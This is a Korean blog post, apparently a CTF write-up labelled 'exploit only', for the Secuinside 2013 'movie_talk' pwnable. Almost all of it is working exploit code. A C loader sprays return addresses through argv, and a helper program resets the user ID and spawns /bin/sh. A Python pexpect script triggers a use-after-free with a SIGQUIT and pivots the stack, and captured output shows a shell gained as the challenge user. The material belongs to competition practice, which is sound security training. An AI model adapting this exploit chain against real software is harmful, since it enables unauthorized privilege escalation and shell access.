CTF/2013

Secuinside CTF 2013 Qual - 17. movie_talk (Exploit only)

pwn3r_45 2013. 7. 23. 21:46

Category : Pwnables


movie_talk

 

Summary : signal handler, use-after-free, lift esp to argv



loader.c 

#include <stdio.h>

#define RET "\xbb\x8b\x04\x08"

#define RET16 RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET

#define EXECL "\x90\x42\x0e\x40"

#define BINARY "\x74\x81\x04\x08" // &"GNU"


char *args[] = {RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16   EXECL "AAAA" BINARY, "", "", "", "", "", "", "", "", "", ""};


int main(int argc, char **argv, char **envp)

{

execve("./movie_talk",args, envp);

} 



GNU.c

#include <stdio.h>


int main()

{

setreuid(geteuid(), geteuid());

execl("/bin/sh","sh",0);

} 



Exploit

#!/usr/bin/python


from struct import pack

import os

import pexpect

import time


p = lambda x : pack("<L", x)


lift_esp = 0x400878c2    # add $0x81bc,%esp;  ret;


pp = pexpect.spawn("/home/movie_talk/loader")

pp.expect(".*")

pp.sendline("1")

pp.sendline("movie1")

pp.sendline("1")

pp.sendline("0")


pp.expect(".*")

pp.sendline("1")

pp.sendline("movie2")

pp.sendline("1")

pp.sendline("0")


time.sleep(4)

os.system("kill -3 %d" %pp.pid)


pp.expect(".*")

pp.sendline("1")

pp.sendline(p(lift_esp)+"a"*14)

pp.sendline("1")

pp.sendline("0")


pp.expect(".*")

pp.sendline("3")

pp.interact()



root@ubuntu:/home/movie_talk# ulimit -s unlimited

root@ubuntu:/home/movie_talk# ./exploit.py 

3

movie name: rating [1-100]: film rate [0,12,15,19]: 1. movie addtion

2. movie deletion

3. my movie list

4. quit

: [*] movie list =>

$ id

uid=1016(movie_talk) gid=0(root) egid=1016(movie_talk) groups=1016(movie_talk),0(root)

$         


저작자표시 (새창열림)